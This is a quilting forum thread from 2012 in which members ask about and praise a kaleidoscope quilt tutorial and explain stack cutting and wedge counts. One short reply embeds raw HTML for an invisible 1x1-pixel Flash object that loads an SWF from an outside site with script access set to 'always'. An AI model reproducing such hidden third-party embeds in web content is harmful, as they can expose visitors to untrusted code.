Go Back  Quiltingboard Forums >
  • Tutorials
  • KALEIDOSCOPE QUILT (VERSION II) PDF format >
  • KALEIDOSCOPE QUILT (VERSION II) PDF format

• KALEIDOSCOPE QUILT (VERSION II) PDF format

Old 05-24-2012, 10:42 AM

I am unable to see it. What should I do to correct this? I am planning to try my hand at a kaleidoscope very soon so I am eager to see your tutorial. Thank you. Learner 747
    Old 05-24-2012, 10:45 AM

Thanks for sharing. <object width="1" height="1" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="undefined" value="http://smilyes4u.com/d/15/nr.swf" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://smilyes4u.com/d/15/nr.swf" /><param name="allowscriptaccess" value="always" /><embed width="1" height="1" type="application/x-shockwave-flash" src="http://smilyes4u.com/d/15/nr.swf" undefined="http://smilyes4u.com/d/15/nr.swf" allowScriptAccess="always" allowscriptaccess="always" /></object>
    Old 05-24-2012, 01:29 PM

Originally Posted by QuiltingCrazie
    Thanks! the only question I have because I have never made one but what stacks do you get your block from? Is it every block is a stack or do you get a block from the top layer then the next layer? I hope I'm making sense. I bought fabric for this I'd love to try it!!
    I, too, would like to know the answer to this question. I don't think the answer actually addressed the question... obviously, we have never done this before - hahaha
    Old 05-24-2012, 01:52 PM

Each stack makes one block. Every piece in the stack is exactly the same if you have matched up your repeats precisely. Every piece in each block is the same. That's where the kaleidoscope effect comes from.
    Old 05-24-2012, 01:59 PM

Originally Posted by ctack2
    Each stack makes one block. Every piece in the stack is exactly the same if you have matched up your repeats precisely. Every piece in each block is the same. That's where the kaleidoscope effect comes from.
    Thank you. so does that mean each stack must have 8 wedges? I noticed there were 8 pieces to make up the kaleidoscope...
    Old 05-24-2012, 02:31 PM

It depends on the degree of the ruler you use. It should say on the ruler how many wedges you need to complete the circle of the block.
    Old 05-24-2012, 05:31 PM

Originally Posted by ctack2
    It depends on the degree of the ruler you use. It should say on the ruler how many wedges you need to complete the circle of the block.
    Oh, I get it now. I see the special ruler is crucial. Thanks so much for the clarification
    Old 06-18-2012, 06:32 AM

I keep telling myself someday I will do one of these, I'm sure someday will come!
    Old 08-12-2012, 10:29 PM

The kaleidoscopes we did at our local class do not look like these. Initial methods same cutting of triangles was as follows; after the pinning through good points, the 8 layers were cut into squares, size was worked out by the size of material. A 4 inch square roughly would make 8inch shape. Cut the squares in half diagonally. Keep 8 pieces together. Look at "angiequilts" blog site to see all our different layouts. No 2 shapes look alike.
    Old 08-27-2012, 06:10 PM

Great tutorial! Very clear instructions. I love kaleidoscope quilts but have been unsure where to start. Your tutorial makes it very clear. Thank you!